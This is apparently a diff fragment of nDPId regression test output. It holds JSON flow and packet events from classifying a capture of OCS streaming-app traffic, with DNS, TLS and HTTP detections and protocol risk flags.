-00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1449652787983,"flow_last_seen":1449652790713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1449652790713,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1449652792355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652792355,"pkt":"RQAAPKb0QABABiV3wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIcdQAAAIEBbQEAggKADWE2AAAAAABAwMG"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652797357,"flow_last_seen":1449652797357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652797357,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1449652797357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652797357,"pkt":"RQAAPAMUQABABslXwKi0AkDpuLyAsgG7QZiF2AAAAACgAjkIz8gAAAIEBbQEAggKADWGzAAAAAABAwMG"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1449652797427,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652797427,"pkt":"RQAANAMVQABABslewKi0AkDpuLyAsgG7QZiF2aTu9RqAEADl+L8AAAEBCAoANYbSHkOFlA=="} 00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1449652797442,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":271,"pkt_l4_len":251,"thread_ts_msec":1449652797442,"pkt":"RQABDwMWQABABsiCwKi0AkDpuLyAsgG7QZiF2aTu9RqAGADlVfIAAAEBCAoANYbUHkOFlBYDAQDWAQAA0gMD4HuK+eOlMdUOH1cZsMt60He+NukWbTB7f1JNaYrt+NsAACjAK8AswC\/AMACeAJ\/ACcAKwBPAFAAzADnAB8ARAJwAnQAvADUABQD\/AQAAgQAAABUAEwAAEG10YWxrLmdvb2dsZS5jb20ACwAEAwABAgAKADQAMgAOAA0AGQALAAwAGAAJAAoAFgAXAAgABgAHABQAFQAEAAUAEgATAAEAAgADAA8AEAARACMAAAANACAAHgYBBgIGAwUBBQIFAwQBBAIEAwMBAwIDAwIBAgICAw=="} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652797357,"flow_last_seen":1449652797442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1449652797442,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652797357,"flow_last_seen":1449652797442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1449652797442,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652798230,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1449652798230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":65,"pkt_l4_len":45,"thread_ts_msec":1449652798230,"pkt":"RQAAQYcjQABAES7OwKi0AggICAguEQA1AC1oEnazAQAAAQAAAAAAAARwbGF5Cmdvb2dsZWFwaXMDY29tAAABAAE="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652798230,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652798230,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798305,"flow_last_seen":1449652798305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652798305,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1449652798305,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652798305,"pkt":"RQAAPHAIQABABm7AwKi0AkDppl+6uwG7gNP3IgAAAACgAjkI9zgAAAIEBbQEAggKADWHKgAAAAABAwMG"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1449652798386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652798386,"pkt":"RQAANHAJQABABm7HwKi0AkDppl+6uwG7gNP3IxI082eAEADlT7wAAAEBCAoANYczAMsH6w=="} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1449652798392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":236,"pkt_l4_len":216,"thread_ts_msec":1449652798392,"pkt":"RQAA7HAKQABABm4OwKi0AkDppl+6uwG7gNP3IxI082eAGADln0MAAAEBCAoANYczAMsH6xYDAQCzAQAArwMBVmhd\/avXwE9Hbo+g4bJoaBoe\/PaQpNdc4O0Q8a7HcbYAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652798305,"flow_last_seen":1449652798392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652798392,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652798305,"flow_last_seen":1449652798392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652798392,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652842535,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1449652842535,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":56,"pkt_l4_len":36,"thread_ts_msec":1449652842535,"pkt":"RQAAOJhyQABAER2IwKi0AggICAhetQA1ACRtrFcaAQAAAQAAAAAAAAN3d3cDb2NzAmZyAAABAAE="} -00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652842535,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"www.ocs.fr","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652842535,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"www.ocs.fr","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842628,"flow_last_seen":1449652842628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652842628,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1449652842628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652842628,"pkt":"RQAAPD8ZQABABgMtwKi0ArL40NKmXgBQrzCnYwAAAACgAjkIgJAAAAIEBbQEAggKADWYegAAAAABAwMG"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1449652842700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652842700,"pkt":"RQAAND8aQABABgM0wKi0ArL40NKmXgBQrzCnZDkypeeAEADlhQYAAAEBCAoANZiCGkFpBQ=="} 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1449652842701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":204,"pkt_l4_len":184,"thread_ts_msec":1449652842701,"pkt":"RQAAzD8bQABABgKbwKi0ArL40NKmXgBQrzCnZDkypeeAGADlkB4AAAEBCAoANZiCGkFpBUdFVCAvZGF0YV9wbGF0ZWZvcm1lL3Byb2dyYW0vMTg0OTYvdHZfZGV0YWlsX21vcnRkdW5wb3VydzAwMTIyMzZfNzJmNmMuanBnIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IHd3dy5vY3MuZnINCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652842628,"flow_last_seen":1449652842701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1449652842701,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"www.ocs.fr","url":"www.ocs.fr\/data_plateforme\/program\/18496\/tv_detail_mortdunpourw0012236_72f6c.jpg","code":0,"content_type":"","user_agent":""}} -00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":895,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1449652842628,"flow_last_seen":1449652843470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1449652843470,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"www.ocs.fr","url":"www.ocs.fr\/data_plateforme\/program\/18496\/tv_detail_mortdunpourw0012236_72f6c.jpg","code":0,"content_type":"","user_agent":""}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1449652842628,"flow_last_seen":1449652846380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652842628,"flow_last_seen":1449652842701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1449652842701,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"www.ocs.fr","url":"www.ocs.fr\/data_plateforme\/program\/18496\/tv_detail_mortdunpourw0012236_72f6c.jpg","code":0,"content_type":"","user_agent":""}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1449652842628,"flow_last_seen":1449652846380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1449652786395,"flow_last_seen":1449652787578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652787596,"flow_last_seen":1449652818681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Azure","breed":"Acceptable","category":"Cloud"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652787596,"flow_last_seen":1449652818681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1449652784341,"flow_last_seen":1449652792355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":47699,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1449652784341,"flow_last_seen":1449652792355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":47699,"dst_port":5228,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1449652786152,"flow_last_seen":1449652788767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1683,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00827{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1449652786152,"flow_last_seen":1449652788767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1683,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Crashlytics","breed":"Acceptable","category":"DataTransfer"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652786167,"flow_last_seen":1449652786398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1449652788109,"flow_last_seen":1449652791955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5041,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 